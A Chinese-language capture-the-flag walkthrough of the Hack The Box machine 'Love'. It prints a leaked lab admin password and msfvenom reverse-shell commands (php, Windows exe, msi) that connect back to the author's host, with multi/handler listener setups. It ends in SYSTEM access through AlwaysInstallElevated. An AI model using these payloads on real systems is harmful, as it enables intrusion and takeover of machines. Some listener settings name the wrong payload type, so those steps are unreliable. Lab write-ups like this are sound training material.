文章目录
前言
一、nmap信息收集
首先,老规矩,先给它嘛来一梭子,nmap走起!
看看开启了那些端口,那些服务
好的,开启了很多的服务,开启的端口越多对我们越有利 (笑容逐渐放肆)
再次进行详细的信息收集
去各个端口访问一波,没太大的收获,其中80和5000端口如下:
被禁止访问了!有点意思,肯定有货,才禁止我们访问
二、ssl证书域名解析
发现443端口上提示有个staging.love.htb域名,很好,那么我们可以去修改
/etc/hosts的文件,指定这个域名的解析ip为10.10.10.239,然后就可以去访问这个域名了,kali中的修改命令如下:vim /etc/hosts
成功访问,结果如下:
home看起来没有什么特别值得关注的,直接到demo
发现可以通过 “url地址” 去访问文件,于是想起了那个被禁止的5000端口,于是尝试一下,看看能不能访问,命令 “ localhost:5000 ” ,访问结果如下:
成功获取账号与密码:
账号:admin
密码:@LoveIsInTheAir!!! (咳咳,翻译:爱在空气里,所以说啊,爱不可靠啊)
80端口不是有个登录界面吗?直接输入账号密码,然后就可以登录进去了
三、进入后台,获取反向的shell
进入后台的管理界面如下:
然后找到这个:
点击new:
这里有个photo的地方, 可以上传php文件,那么我们就可以上传一个php/reverse_tcp文件用来反向连接我们的主机,我们可以使用msfvenom来创建一个php的反向shell文件,命令如下:
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.15.156 lport=3333 -f raw -o a.php
然后使用kali另外的终端来监听,命令如下:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.15.156
set lport 3333
exploit
四、windows_reverse_shell
由于php的反向shell连接不稳定,所以我们创建一个新的反向shell,同样使用msfvenom来创建,命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.15.156 lport=4444 -f exe -o 123.exe
在上传php的地方上传,然后再在phpshell里面执行这个文件
执行的命令如下:
execute -H -f 123.exe
同样使用另外的端口来监听:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.15.156
set lport 4444
exploit
然后就可以在新的端口得到一个连接
五、提权
提权我们可以利用AlwaysInstalledElevated的提权漏洞,
那么创建一个msi文件,命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.15.156 lport=5555 -f msi > shell.msi
在123.exe的shell中执行 execute -H -f shell.msi
再次开启一个新的端口监听:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.15.156
set lport 5555
exploit
然后可以得到一个连接,使用getuid可以得到sytem权限
总结
还是很菜啊,还是得继续努力加油,干巴跌